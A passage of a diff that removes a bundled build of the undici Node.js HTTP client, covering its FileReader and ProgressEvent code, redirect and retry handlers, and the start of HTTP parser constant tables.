webidl.converters.DOMString(type) - eventInitDict = webidl.converters.ProgressEventInit(eventInitDict ?? {}) - - super(type, eventInitDict) - - this[kState] = { - lengthComputable: eventInitDict.lengthComputable, - loaded: eventInitDict.loaded, - total: eventInitDict.total - } - } - - get lengthComputable () { - webidl.brandCheck(this, ProgressEvent) - - return this[kState].lengthComputable - } - - get loaded () { - webidl.brandCheck(this, ProgressEvent) - - return this[kState].loaded - } - - get total () { - webidl.brandCheck(this, ProgressEvent) - - return this[kState].total - } -} - -webidl.converters.ProgressEventInit = webidl.dictionaryConverter([ - { - key: 'lengthComputable', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'loaded', - converter: webidl.converters['unsigned long long'], - defaultValue: 0 - }, - { - key: 'total', - converter: webidl.converters['unsigned long long'], - defaultValue: 0 - }, - { - key: 'bubbles', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'cancelable', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'composed', - converter: webidl.converters.boolean, - defaultValue: false - } -]) - -module.exports = { - ProgressEvent -} - - -/***/ }), - -/***/ 9054: -/***/ ((module) => { - -"use strict"; - - -module.exports = { - kState: Symbol('FileReader state'), - kResult: Symbol('FileReader result'), - kError: Symbol('FileReader error'), - kLastProgressEventFired: Symbol('FileReader last progress event fired timestamp'), - kEvents: Symbol('FileReader events'), - kAborted: Symbol('FileReader aborted') -} - - -/***/ }), - -/***/ 7530: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { - kState, - kError, - kResult, - kAborted, - kLastProgressEventFired -} = __nccwpck_require__(9054) -const { ProgressEvent } = __nccwpck_require__(5504) -const { getEncoding } = __nccwpck_require__(4854) -const { DOMException } = __nccwpck_require__(1037) -const { serializeAMimeType, parseMIMEType } = __nccwpck_require__(685) -const { types } = __nccwpck_require__(3837) -const { StringDecoder } = __nccwpck_require__(1576) -const { btoa } = __nccwpck_require__(4300) - -/** @type {PropertyDescriptor} */ -const staticPropertyDescriptors = { - enumerable: true, - writable: false, - configurable: false -} - -/** - * @see https://w3c.github.io/FileAPI/#readOperation - * @param {import('./filereader').FileReader} fr - * @param {import('buffer').Blob} blob - * @param {string} type - * @param {string?} encodingName - */ -function readOperation (fr, blob, type, encodingName) { - // 1. If fr’s state is "loading", throw an InvalidStateError - // DOMException. - if (fr[kState] === 'loading') { - throw new DOMException('Invalid state', 'InvalidStateError') - } - - // 2. Set fr’s state to "loading". - fr[kState] = 'loading' - - // 3. Set fr’s result to null. - fr[kResult] = null - - // 4. Set fr’s error to null. - fr[kError] = null - - // 5. Let stream be the result of calling get stream on blob. - /** @type {import('stream/web').ReadableStream} */ - const stream = blob.stream() - - // 6. Let reader be the result of getting a reader from stream. - const reader = stream.getReader() - - // 7. Let bytes be an empty byte sequence. - /** @type {Uint8Array[]} */ - const bytes = [] - - // 8. Let chunkPromise be the result of reading a chunk from - // stream with reader. - let chunkPromise = reader.read() - - // 9. Let isFirstChunk be true. - let isFirstChunk = true - - // 10. In parallel, while true: - // Note: "In parallel" just means non-blocking - // Note 2: readOperation itself cannot be async as double - // reading the body would then reject the promise, instead - // of throwing an error. - ;(async () => { - while (!fr[kAborted]) { - // 1. Wait for chunkPromise to be fulfilled or rejected. - try { - const { done, value } = await chunkPromise - - // 2. If chunkPromise is fulfilled, and isFirstChunk is - // true, queue a task to fire a progress event called - // loadstart at fr. - if (isFirstChunk && !fr[kAborted]) { - queueMicrotask(() => { - fireAProgressEvent('loadstart', fr) - }) - } - - // 3. Set isFirstChunk to false. - isFirstChunk = false - - // 4. If chunkPromise is fulfilled with an object whose - // done property is false and whose value property is - // a Uint8Array object, run these steps: - if (!done && types.isUint8Array(value)) { - // 1. Let bs be the byte sequence represented by the - // Uint8Array object. - - // 2. Append bs to bytes. - bytes.push(value) - - // 3. If roughly 50ms have passed since these steps - // were last invoked, queue a task to fire a - // progress event called progress at fr. - if ( - ( - fr[kLastProgressEventFired] === undefined || - Date.now() - fr[kLastProgressEventFired] >= 50 - ) && - !fr[kAborted] - ) { - fr[kLastProgressEventFired] = Date.now() - queueMicrotask(() => { - fireAProgressEvent('progress', fr) - }) - } - - // 4. Set chunkPromise to the result of reading a - // chunk from stream with reader. - chunkPromise = reader.read() - } else if (done) { - // 5. Otherwise, if chunkPromise is fulfilled with an - // object whose done property is true, queue a task - // to run the following steps and abort this algorithm: - queueMicrotask(() => { - // 1. Set fr’s state to "done". - fr[kState] = 'done' - - // 2. Let result be the result of package data given - // bytes, type, blob’s type, and encodingName. - try { - const result = packageData(bytes, type, blob.type, encodingName) - - // 4. Else: - - if (fr[kAborted]) { - return - } - - // 1. Set fr’s result to result. - fr[kResult] = result - - // 2. Fire a progress event called load at the fr. - fireAProgressEvent('load', fr) - } catch (error) { - // 3. If package data threw an exception error: - - // 1. Set fr’s error to error. - fr[kError] = error - - // 2. Fire a progress event called error at fr. - fireAProgressEvent('error', fr) - } - - // 5. If fr’s state is not "loading", fire a progress - // event called loadend at the fr. - if (fr[kState] !== 'loading') { - fireAProgressEvent('loadend', fr) - } - }) - - break - } - } catch (error) { - if (fr[kAborted]) { - return - } - - // 6. Otherwise, if chunkPromise is rejected with an - // error error, queue a task to run the following - // steps and abort this algorithm: - queueMicrotask(() => { - // 1. Set fr’s state to "done". - fr[kState] = 'done' - - // 2. Set fr’s error to error. - fr[kError] = error - - // 3. Fire a progress event called error at fr. - fireAProgressEvent('error', fr) - - // 4. If fr’s state is not "loading", fire a progress - // event called loadend at fr. - if (fr[kState] !== 'loading') { - fireAProgressEvent('loadend', fr) - } - }) - - break - } - } - })() -} - -/** - * @see https://w3c.github.io/FileAPI/#fire-a-progress-event - * @see https://dom.spec.whatwg.org/#concept-event-fire - * @param {string} e The name of the event - * @param {import('./filereader').FileReader} reader - */ -function fireAProgressEvent (e, reader) { - // The progress event e does not bubble. e.bubbles must be false - // The progress event e is NOT cancelable. e.cancelable must be false - const event = new ProgressEvent(e, { - bubbles: false, - cancelable: false - }) - - reader.dispatchEvent(event) -} - -/** - * @see https://w3c.github.io/FileAPI/#blob-package-data - * @param {Uint8Array[]} bytes - * @param {string} type - * @param {string?} mimeType - * @param {string?} encodingName - */ -function packageData (bytes, type, mimeType, encodingName) { - // 1. A Blob has an associated package data algorithm, given - // bytes, a type, a optional mimeType, and a optional - // encodingName, which switches on type and runs the - // associated steps: - - switch (type) { - case 'DataURL': { - // 1. Return bytes as a DataURL [RFC2397] subject to - // the considerations below: - // * Use mimeType as part of the Data URL if it is - // available in keeping with the Data URL - // specification [RFC2397]. - // * If mimeType is not available return a Data URL - // without a media-type. [RFC2397]. - - // https://datatracker.ietf.org/doc/html/rfc2397#section-3 - // dataurl := "data:" [ mediatype ] [ ";base64" ] "," data - // mediatype := [ type "/" subtype ] *( ";" parameter ) - // data := *urlchar - // parameter := attribute "=" value - let dataURL = 'data:' - - const parsed = parseMIMEType(mimeType || 'application/octet-stream') - - if (parsed !== 'failure') { - dataURL += serializeAMimeType(parsed) - } - - dataURL += ';base64,' - - const decoder = new StringDecoder('latin1') - - for (const chunk of bytes) { - dataURL += btoa(decoder.write(chunk)) - } - - dataURL += btoa(decoder.end()) - - return dataURL - } - case 'Text': { - // 1. Let encoding be failure - let encoding = 'failure' - - // 2. If the encodingName is present, set encoding to the - // result of getting an encoding from encodingName. - if (encodingName) { - encoding = getEncoding(encodingName) - } - - // 3. If encoding is failure, and mimeType is present: - if (encoding === 'failure' && mimeType) { - // 1. Let type be the result of parse a MIME type - // given mimeType. - const type = parseMIMEType(mimeType) - - // 2. If type is not failure, set encoding to the result - // of getting an encoding from type’s parameters["charset"]. - if (type !== 'failure') { - encoding = getEncoding(type.parameters.get('charset')) - } - } - - // 4. If encoding is failure, then set encoding to UTF-8. - if (encoding === 'failure') { - encoding = 'UTF-8' - } - - // 5. Decode bytes using fallback encoding encoding, and - // return the result. - return decode(bytes, encoding) - } - case 'ArrayBuffer': { - // Return a new ArrayBuffer whose contents are bytes. - const sequence = combineByteSequences(bytes) - - return sequence.buffer - } - case 'BinaryString': { - // Return bytes as a binary string, in which every byte - // is represented by a code unit of equal value [0..255]. - let binaryString = '' - - const decoder = new StringDecoder('latin1') - - for (const chunk of bytes) { - binaryString += decoder.write(chunk) - } - - binaryString += decoder.end() - - return binaryString - } - } -} - -/** - * @see https://encoding.spec.whatwg.org/#decode - * @param {Uint8Array[]} ioQueue - * @param {string} encoding - */ -function decode (ioQueue, encoding) { - const bytes = combineByteSequences(ioQueue) - - // 1. Let BOMEncoding be the result of BOM sniffing ioQueue. - const BOMEncoding = BOMSniffing(bytes) - - let slice = 0 - - // 2. If BOMEncoding is non-null: - if (BOMEncoding !== null) { - // 1. Set encoding to BOMEncoding. - encoding = BOMEncoding - - // 2. Read three bytes from ioQueue, if BOMEncoding is - // UTF-8; otherwise read two bytes. - // (Do nothing with those bytes.) - slice = BOMEncoding === 'UTF-8' ? 3 : 2 - } - - // 3. Process a queue with an instance of encoding’s - // decoder, ioQueue, output, and "replacement". - - // 4. Return output. - - const sliced = bytes.slice(slice) - return new TextDecoder(encoding).decode(sliced) -} - -/** - * @see https://encoding.spec.whatwg.org/#bom-sniff - * @param {Uint8Array} ioQueue - */ -function BOMSniffing (ioQueue) { - // 1. Let BOM be the result of peeking 3 bytes from ioQueue, - // converted to a byte sequence. - const [a, b, c] = ioQueue - - // 2. For each of the rows in the table below, starting with - // the first one and going down, if BOM starts with the - // bytes given in the first column, then return the - // encoding given in the cell in the second column of that - // row. Otherwise, return null. - if (a === 0xEF && b === 0xBB && c === 0xBF) { - return 'UTF-8' - } else if (a === 0xFE && b === 0xFF) { - return 'UTF-16BE' - } else if (a === 0xFF && b === 0xFE) { - return 'UTF-16LE' - } - - return null -} - -/** - * @param {Uint8Array[]} sequences - */ -function combineByteSequences (sequences) { - const size = sequences.reduce((a, b) => { - return a + b.byteLength - }, 0) - - let offset = 0 - - return sequences.reduce((a, b) => { - a.set(b, offset) - offset += b.byteLength - return a - }, new Uint8Array(size)) -} - -module.exports = { - staticPropertyDescriptors, - readOperation, - fireAProgressEvent -} - - -/***/ }), - -/***/ 1892: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -// We include a version number for the Dispatcher API. In case of breaking changes, -// this version number must be increased to avoid conflicts. -const globalDispatcher = Symbol.for('undici.globalDispatcher.1') -const { InvalidArgumentError } = __nccwpck_require__(8045) -const Agent = __nccwpck_require__(7890) - -if (getGlobalDispatcher() === undefined) { - setGlobalDispatcher(new Agent()) -} - -function setGlobalDispatcher (agent) { - if (!agent || typeof agent.dispatch !== 'function') { - throw new InvalidArgumentError('Argument agent must implement Agent') - } - Object.defineProperty(globalThis, globalDispatcher, { - value: agent, - writable: true, - enumerable: false, - configurable: false - }) -} - -function getGlobalDispatcher () { - return globalThis[globalDispatcher] -} - -module.exports = { - setGlobalDispatcher, - getGlobalDispatcher -} - - -/***/ }), - -/***/ 6930: -/***/ ((module) => { - -"use strict"; - - -module.exports = class DecoratorHandler { - constructor (handler) { - this.handler = handler - } - - onConnect (...args) { - return this.handler.onConnect(...args) - } - - onError (...args) { - return this.handler.onError(...args) - } - - onUpgrade (...args) { - return this.handler.onUpgrade(...args) - } - - onHeaders (...args) { - return this.handler.onHeaders(...args) - } - - onData (...args) { - return this.handler.onData(...args) - } - - onComplete (...args) { - return this.handler.onComplete(...args) - } - - onBodySent (...args) { - return this.handler.onBodySent(...args) - } -} - - -/***/ }), - -/***/ 2860: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const util = __nccwpck_require__(3983) -const { kBodyUsed } = __nccwpck_require__(2785) -const assert = __nccwpck_require__(9491) -const { InvalidArgumentError } = __nccwpck_require__(8045) -const EE = __nccwpck_require__(2361) - -const redirectableStatusCodes = [300, 301, 302, 303, 307, 308] - -const kBody = Symbol('body') - -class BodyAsyncIterable { - constructor (body) { - this[kBody] = body - this[kBodyUsed] = false - } - - async * [Symbol.asyncIterator] () { - assert(!this[kBodyUsed], 'disturbed') - this[kBodyUsed] = true - yield * this[kBody] - } -} - -class RedirectHandler { - constructor (dispatch, maxRedirections, opts, handler) { - if (maxRedirections != null && (!Number.isInteger(maxRedirections) || maxRedirections < 0)) { - throw new InvalidArgumentError('maxRedirections must be a positive number') - } - - util.validateHandler(handler, opts.method, opts.upgrade) - - this.dispatch = dispatch - this.location = null - this.abort = null - this.opts = { ...opts, maxRedirections: 0 } // opts must be a copy - this.maxRedirections = maxRedirections - this.handler = handler - this.history = [] - - if (util.isStream(this.opts.body)) { - // TODO (fix): Provide some way for the user to cache the file to e.g. /tmp - // so that it can be dispatched again? - // TODO (fix): Do we need 100-expect support to provide a way to do this properly? - if (util.bodyLength(this.opts.body) === 0) { - this.opts.body - .on('data', function () { - assert(false) - }) - } - - if (typeof this.opts.body.readableDidRead !== 'boolean') { - this.opts.body[kBodyUsed] = false - EE.prototype.on.call(this.opts.body, 'data', function () { - this[kBodyUsed] = true - }) - } - } else if (this.opts.body && typeof this.opts.body.pipeTo === 'function') { - // TODO (fix): We can't access ReadableStream internal state - // to determine whether or not it has been disturbed. This is just - // a workaround. - this.opts.body = new BodyAsyncIterable(this.opts.body) - } else if ( - this.opts.body && - typeof this.opts.body !== 'string' && - !ArrayBuffer.isView(this.opts.body) && - util.isIterable(this.opts.body) - ) { - // TODO: Should we allow re-using iterable if !this.opts.idempotent - // or through some other flag? - this.opts.body = new BodyAsyncIterable(this.opts.body) - } - } - - onConnect (abort) { - this.abort = abort - this.handler.onConnect(abort, { history: this.history }) - } - - onUpgrade (statusCode, headers, socket) { - this.handler.onUpgrade(statusCode, headers, socket) - } - - onError (error) { - this.handler.onError(error) - } - - onHeaders (statusCode, headers, resume, statusText) { - this.location = this.history.length >= this.maxRedirections || util.isDisturbed(this.opts.body) - ? null - : parseLocation(statusCode, headers) - - if (this.opts.origin) { - this.history.push(new URL(this.opts.path, this.opts.origin)) - } - - if (!this.location) { - return this.handler.onHeaders(statusCode, headers, resume, statusText) - } - - const { origin, pathname, search } = util.parseURL(new URL(this.location, this.opts.origin && new URL(this.opts.path, this.opts.origin))) - const path = search ? `${pathname}${search}` : pathname - - // Remove headers referring to the original URL. - // By default it is Host only, unless it's a 303 (see below), which removes also all Content-* headers. - // https://tools.ietf.org/html/rfc7231#section-6.4 - this.opts.headers = cleanRequestHeaders(this.opts.headers, statusCode === 303, this.opts.origin !== origin) - this.opts.path = path - this.opts.origin = origin - this.opts.maxRedirections = 0 - this.opts.query = null - - // https://tools.ietf.org/html/rfc7231#section-6.4.4 - // In case of HTTP 303, always replace method to be either HEAD or GET - if (statusCode === 303 && this.opts.method !== 'HEAD') { - this.opts.method = 'GET' - this.opts.body = null - } - } - - onData (chunk) { - if (this.location) { - /* - https://tools.ietf.org/html/rfc7231#section-6.4 - - TLDR: undici always ignores 3xx response bodies. - - Redirection is used to serve the requested resource from another URL, so it is assumes that - no body is generated (and thus can be ignored). Even though generating a body is not prohibited. - - For status 301, 302, 303, 307 and 308 (the latter from RFC 7238), the specs mention that the body usually - (which means it's optional and not mandated) contain just an hyperlink to the value of - the Location response header, so the body can be ignored safely. - - For status 300, which is "Multiple Choices", the spec mentions both generating a Location - response header AND a response body with the other possible location to follow. - Since the spec explicitily chooses not to specify a format for such body and leave it to - servers and browsers implementors, we ignore the body as there is no specified way to eventually parse it. - */ - } else { - return this.handler.onData(chunk) - } - } - - onComplete (trailers) { - if (this.location) { - /* - https://tools.ietf.org/html/rfc7231#section-6.4 - - TLDR: undici always ignores 3xx response trailers as they are not expected in case of redirections - and neither are useful if present. - - See comment on onData method above for more detailed informations. - */ - - this.location = null - this.abort = null - - this.dispatch(this.opts, this) - } else { - this.handler.onComplete(trailers) - } - } - - onBodySent (chunk) { - if (this.handler.onBodySent) { - this.handler.onBodySent(chunk) - } - } -} - -function parseLocation (statusCode, headers) { - if (redirectableStatusCodes.indexOf(statusCode) === -1) { - return null - } - - for (let i = 0; i < headers.length; i += 2) { - if (headers[i].toString().toLowerCase() === 'location') { - return headers[i + 1] - } - } -} - -// https://tools.ietf.org/html/rfc7231#section-6.4.4 -function shouldRemoveHeader (header, removeContent, unknownOrigin) { - return ( - (header.length === 4 && header.toString().toLowerCase() === 'host') || - (removeContent && header.toString().toLowerCase().indexOf('content-') === 0) || - (unknownOrigin && header.length === 13 && header.toString().toLowerCase() === 'authorization') || - (unknownOrigin && header.length === 6 && header.toString().toLowerCase() === 'cookie') - ) -} - -// https://tools.ietf.org/html/rfc7231#section-6.4 -function cleanRequestHeaders (headers, removeContent, unknownOrigin) { - const ret = [] - if (Array.isArray(headers)) { - for (let i = 0; i < headers.length; i += 2) { - if (!shouldRemoveHeader(headers[i], removeContent, unknownOrigin)) { - ret.push(headers[i], headers[i + 1]) - } - } - } else if (headers && typeof headers === 'object') { - for (const key of Object.keys(headers)) { - if (!shouldRemoveHeader(key, removeContent, unknownOrigin)) { - ret.push(key, headers[key]) - } - } - } else { - assert(headers == null, 'headers must be an object or an array') - } - return ret -} - -module.exports = RedirectHandler - - -/***/ }), - -/***/ 2286: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -const assert = __nccwpck_require__(9491) - -const { kRetryHandlerDefaultRetry } = __nccwpck_require__(2785) -const { RequestRetryError } = __nccwpck_require__(8045) -const { isDisturbed, parseHeaders, parseRangeHeader } = __nccwpck_require__(3983) - -function calculateRetryAfterHeader (retryAfter) { - const current = Date.now() - const diff = new Date(retryAfter).getTime() - current - - return diff -} - -class RetryHandler { - constructor (opts, handlers) { - const { retryOptions, ...dispatchOpts } = opts - const { - // Retry scoped - retry: retryFn, - maxRetries, - maxTimeout, - minTimeout, - timeoutFactor, - // Response scoped - methods, - errorCodes, - retryAfter, - statusCodes - } = retryOptions ?? {} - - this.dispatch = handlers.dispatch - this.handler = handlers.handler - this.opts = dispatchOpts - this.abort = null - this.aborted = false - this.retryOpts = { - retry: retryFn ?? RetryHandler[kRetryHandlerDefaultRetry], - retryAfter: retryAfter ?? true, - maxTimeout: maxTimeout ?? 30 * 1000, // 30s, - timeout: minTimeout ?? 500, // .5s - timeoutFactor: timeoutFactor ?? 2, - maxRetries: maxRetries ?? 5, - // What errors we should retry - methods: methods ?? ['GET', 'HEAD', 'OPTIONS', 'PUT', 'DELETE', 'TRACE'], - // Indicates which errors to retry - statusCodes: statusCodes ?? [500, 502, 503, 504, 429], - // List of errors to retry - errorCodes: errorCodes ?? [ - 'ECONNRESET', - 'ECONNREFUSED', - 'ENOTFOUND', - 'ENETDOWN', - 'ENETUNREACH', - 'EHOSTDOWN', - 'EHOSTUNREACH', - 'EPIPE' - ] - } - - this.retryCount = 0 - this.start = 0 - this.end = null - this.etag = null - this.resume = null - - // Handle possible onConnect duplication - this.handler.onConnect(reason => { - this.aborted = true - if (this.abort) { - this.abort(reason) - } else { - this.reason = reason - } - }) - } - - onRequestSent () { - if (this.handler.onRequestSent) { - this.handler.onRequestSent() - } - } - - onUpgrade (statusCode, headers, socket) { - if (this.handler.onUpgrade) { - this.handler.onUpgrade(statusCode, headers, socket) - } - } - - onConnect (abort) { - if (this.aborted) { - abort(this.reason) - } else { - this.abort = abort - } - } - - onBodySent (chunk) { - if (this.handler.onBodySent) return this.handler.onBodySent(chunk) - } - - static [kRetryHandlerDefaultRetry] (err, { state, opts }, cb) { - const { statusCode, code, headers } = err - const { method, retryOptions } = opts - const { - maxRetries, - timeout, - maxTimeout, - timeoutFactor, - statusCodes, - errorCodes, - methods - } = retryOptions - let { counter, currentTimeout } = state - - currentTimeout = - currentTimeout != null && currentTimeout > 0 ? currentTimeout : timeout - - // Any code that is not a Undici's originated and allowed to retry - if ( - code && - code !== 'UND_ERR_REQ_RETRY' && - code !== 'UND_ERR_SOCKET' && - !errorCodes.includes(code) - ) { - cb(err) - return - } - - // If a set of method are provided and the current method is not in the list - if (Array.isArray(methods) && !methods.includes(method)) { - cb(err) - return - } - - // If a set of status code are provided and the current status code is not in the list - if ( - statusCode != null && - Array.isArray(statusCodes) && - !statusCodes.includes(statusCode) - ) { - cb(err) - return - } - - // If we reached the max number of retries - if (counter > maxRetries) { - cb(err) - return - } - - let retryAfterHeader = headers != null && headers['retry-after'] - if (retryAfterHeader) { - retryAfterHeader = Number(retryAfterHeader) - retryAfterHeader = isNaN(retryAfterHeader) - ? calculateRetryAfterHeader(retryAfterHeader) - : retryAfterHeader * 1e3 // Retry-After is in seconds - } - - const retryTimeout = - retryAfterHeader > 0 - ? Math.min(retryAfterHeader, maxTimeout) - : Math.min(currentTimeout * timeoutFactor ** counter, maxTimeout) - - state.currentTimeout = retryTimeout - - setTimeout(() => cb(null), retryTimeout) - } - - onHeaders (statusCode, rawHeaders, resume, statusMessage) { - const headers = parseHeaders(rawHeaders) - - this.retryCount += 1 - - if (statusCode >= 300) { - this.abort( - new RequestRetryError('Request failed', statusCode, { - headers, - count: this.retryCount - }) - ) - return false - } - - // Checkpoint for resume from where we left it - if (this.resume != null) { - this.resume = null - - if (statusCode !== 206) { - return true - } - - const contentRange = parseRangeHeader(headers['content-range']) - // If no content range - if (!contentRange) { - this.abort( - new RequestRetryError('Content-Range mismatch', statusCode, { - headers, - count: this.retryCount - }) - ) - return false - } - - // Let's start with a weak etag check - if (this.etag != null && this.etag !== headers.etag) { - this.abort( - new RequestRetryError('ETag mismatch', statusCode, { - headers, - count: this.retryCount - }) - ) - return false - } - - const { start, size, end = size } = contentRange - - assert(this.start === start, 'content-range mismatch') - assert(this.end == null || this.end === end, 'content-range mismatch') - - this.resume = resume - return true - } - - if (this.end == null) { - if (statusCode === 206) { - // First time we receive 206 - const range = parseRangeHeader(headers['content-range']) - - if (range == null) { - return this.handler.onHeaders( - statusCode, - rawHeaders, - resume, - statusMessage - ) - } - - const { start, size, end = size } = range - - assert( - start != null && Number.isFinite(start) && this.start !== start, - 'content-range mismatch' - ) - assert(Number.isFinite(start)) - assert( - end != null && Number.isFinite(end) && this.end !== end, - 'invalid content-length' - ) - - this.start = start - this.end = end - } - - // We make our best to checkpoint the body for further range headers - if (this.end == null) { - const contentLength = headers['content-length'] - this.end = contentLength != null ? Number(contentLength) : null - } - - assert(Number.isFinite(this.start)) - assert( - this.end == null || Number.isFinite(this.end), - 'invalid content-length' - ) - - this.resume = resume - this.etag = headers.etag != null ? headers.etag : null - - return this.handler.onHeaders( - statusCode, - rawHeaders, - resume, - statusMessage - ) - } - - const err = new RequestRetryError('Request failed', statusCode, { - headers, - count: this.retryCount - }) - - this.abort(err) - - return false - } - - onData (chunk) { - this.start += chunk.length - - return this.handler.onData(chunk) - } - - onComplete (rawTrailers) { - this.retryCount = 0 - return this.handler.onComplete(rawTrailers) - } - - onError (err) { - if (this.aborted || isDisturbed(this.opts.body)) { - return this.handler.onError(err) - } - - this.retryOpts.retry( - err, - { - state: { counter: this.retryCount++, currentTimeout: this.retryAfter }, - opts: { retryOptions: this.retryOpts, ...this.opts } - }, - onRetry.bind(this) - ) - - function onRetry (err) { - if (err != null || this.aborted || isDisturbed(this.opts.body)) { - return this.handler.onError(err) - } - - if (this.start !== 0) { - this.opts = { - ...this.opts, - headers: { - ...this.opts.headers, - range: `bytes=${this.start}-${this.end ?? ''}` - } - } - } - - try { - this.dispatch(this.opts, this) - } catch (err) { - this.handler.onError(err) - } - } - } -} - -module.exports = RetryHandler - - -/***/ }), - -/***/ 8861: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const RedirectHandler = __nccwpck_require__(2860) - -function createRedirectInterceptor ({ maxRedirections: defaultMaxRedirections }) { - return (dispatch) => { - return function Intercept (opts, handler) { - const { maxRedirections = defaultMaxRedirections } = opts - - if (!maxRedirections) { - return dispatch(opts, handler) - } - - const redirectHandler = new RedirectHandler(dispatch, maxRedirections, opts, handler) - opts = { ...opts, maxRedirections: 0 } // Stop sub dispatcher from also redirecting. - return dispatch(opts, redirectHandler) - } - } -} - -module.exports = createRedirectInterceptor - - -/***/ }), - -/***/ 953: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.SPECIAL_HEADERS = exports.HEADER_STATE = exports.MINOR = exports.MAJOR = exports.CONNECTION_TOKEN_CHARS = exports.HEADER_CHARS = exports.TOKEN = exports.STRICT_TOKEN = exports.HEX = exports.URL_CHAR = exports.STRICT_URL_CHAR = exports.USERINFO_CHARS = exports.MARK = exports.ALPHANUM = exports.NUM = exports.HEX_MAP = exports.NUM_MAP = exports.ALPHA = exports.FINISH = exports.H_METHOD_MAP = exports.METHOD_MAP = exports.METHODS_RTSP = exports.METHODS_ICE = exports.METHODS_HTTP = exports.METHODS = exports.LENIENT_FLAGS = exports.FLAGS = exports.TYPE = exports.ERROR = void 0; -const utils_1 = __nccwpck_require__(1891); -// C headers -var ERROR; -(function (ERROR) { - ERROR[ERROR["OK"] = 0] = "OK"; - ERROR[ERROR["INTERNAL"] = 1] = "INTERNAL"; - ERROR[ERROR["STRICT"] = 2] = "STRICT"; - ERROR[ERROR["LF_EXPECTED"] = 3] = "LF_EXPECTED"; - ERROR[ERROR["UNEXPECTED_CONTENT_LENGTH"] = 4] = "UNEXPECTED_CONTENT_LENGTH"; - ERROR[ERROR["CLOSED_CONNECTION"] = 5] = "CLOSED_CONNECTION"; - ERROR[ERROR["INVALID_METHOD"] = 6] = "INVALID_METHOD"; - ERROR[ERROR["INVALID_URL"] = 7] = "INVALID_URL"; - ERROR[ERROR["INVALID_CONSTANT"] = 8] = "INVALID_CONSTANT"; - ERROR[ERROR["INVALID_VERSION"] = 9] = "INVALID_VERSION"; - ERROR[ERROR["INVALID_HEADER_TOKEN"] = 10] = "INVALID_HEADER_TOKEN"; - ERROR[ERROR["INVALID_CONTENT_LENGTH"] = 11] = "INVALID_CONTENT_LENGTH"; - ERROR[ERROR["INVALID_CHUNK_SIZE"] = 12] = "INVALID_CHUNK_SIZE"; - ERROR[ERROR["INVALID_STATUS"] = 13] = "INVALID_STATUS"; - ERROR[ERROR["INVALID_EOF_STATE"] = 14] = "INVALID_EOF_STATE"; - ERROR[ERROR["INVALID_TRANSFER_ENCODING"] = 15] = "INVALID_TRANSFER_ENCODING"; - ERROR[ERROR["CB_MESSAGE_BEGIN"] = 16] = "CB_MESSAGE_BEGIN"; - ERROR[ERROR["CB_HEADERS_COMPLETE"] = 17] = "CB_HEADERS_COMPLETE"; - ERROR[ERROR["CB_MESSAGE_COMPLETE"] = 18] = "CB_MESSAGE_COMPLETE"; - ERROR[ERROR["CB_CHUNK_HEADER"] = 19] = "CB_CHUNK_HEADER"; - ERROR[ERROR["CB_CHUNK_COMPLETE"] = 20] = "CB_CHUNK_COMPLETE"; - ERROR[ERROR["PAUSED"] = 21] = "PAUSED"; - ERROR[ERROR["PAUSED_UPGRADE"] = 22] = "PAUSED_UPGRADE"; - ERROR[ERROR["PAUSED_H2_UPGRADE"] = 23] = "PAUSED_H2_UPGRADE"; - ERROR[ERROR["USER"] = 24] = "USER"; -})(ERROR = exports.ERROR || (exports.ERROR = {})); -var TYPE; -(function (TYPE) { - TYPE[TYPE["BOTH"] = 0] = "BOTH"; - TYPE[TYPE["REQUEST"] = 1] = "REQUEST"; - TYPE[TYPE["RESPONSE"] = 2] = "RESPONSE"; -})(TYPE = exports.TYPE || (exports.TYPE = {})); -var FLAGS; -(function (FLAGS) { - FLAGS[FLAGS["CONNECTION_KEEP_ALIVE"] = 1] = "CONNECTION_KEEP_ALIVE"; - FLAGS[FLAGS["CONNECTION_CLOSE"] = 2] = "CONNECTION_CLOSE"; - FLAGS[FLAGS["CONNECTION_UPGRADE"] = 4] = "CONNECTION_UPGRADE"; - FLAGS[FLAGS["CHUNKED"] = 8] = "CHUNKED"; - FLAGS[FLAGS["UPGRADE"] = 16] = "UPGRADE"; - FLAGS[FLAGS["CONTENT_LENGTH"] = 32] = "CONTENT_LENGTH"; - FLAGS[FLAGS["SKIPBODY"] = 64] = "SKIPBODY"; - FLAGS[FLAGS["TRAILING"] = 128] = "TRAILING"; - // 1 << 8 is unused - FLAGS[FLAGS["TRANSFER_ENCODING"] = 512] = "TRANSFER_ENCODING"; -})(FLAGS = exports.FLAGS || (exports.FLAGS = {})); -var LENIENT_FLAGS; -(function (LENIENT_FLAGS) { - LENIENT_FLAGS[LENIENT_FLAGS["HEADERS"] = 1] = "HEADERS"; - LENIENT_FLAGS[LENIENT_FLAGS["CHUNKED_LENGTH"] = 2] = "CHUNKED_LENGTH"; - LENIENT_FLAGS[LENIENT_FLAGS["KEEP_ALIVE"] = 4] = "KEEP_ALIVE"; -})(LENIENT_FLAGS = exports.LENIENT_FLAGS || (exports.LENIENT_FLAGS = {})); -var METHODS; -(function (METHODS) { - METHODS[METHODS["DELETE"] = 0] = "DELETE"; - METHODS[METHODS["GET"] = 1] = "GET"; - METHODS[METHODS["HEAD"] = 2] = "HEAD"; - METHODS[METHODS["POST"] = 3] = "POST"; - METHODS[METHODS["PUT"] = 4] = "PUT"; - /* pathological */ - METHODS[METHODS["CONNECT"] = 5] = "CONNECT"; - METHODS[METHODS["OPTIONS"] = 6] = "OPTIONS"; - METHODS[METHODS["TRACE"] = 7] = "TRACE"; - /* WebDAV */ - METHODS[METHODS["COPY"] = 8] = "COPY"; - METHODS[METHODS["LOCK"] = 9] = "LOCK"; - METHODS[METHODS["MKCOL"] = 10] = "MKCOL"; - METHODS[METHODS["MOVE"] = 11] = "MOVE"; - METHODS[METHODS["PROPFIND"] = 12] = "PROPFIND"; - METHODS[METHODS["PROPPATCH"] = 13] = "PROPPATCH"; - METHODS[METHODS["SEARCH"] = 14] = "SEARCH"; - METHODS[METHODS["UNLOCK"] 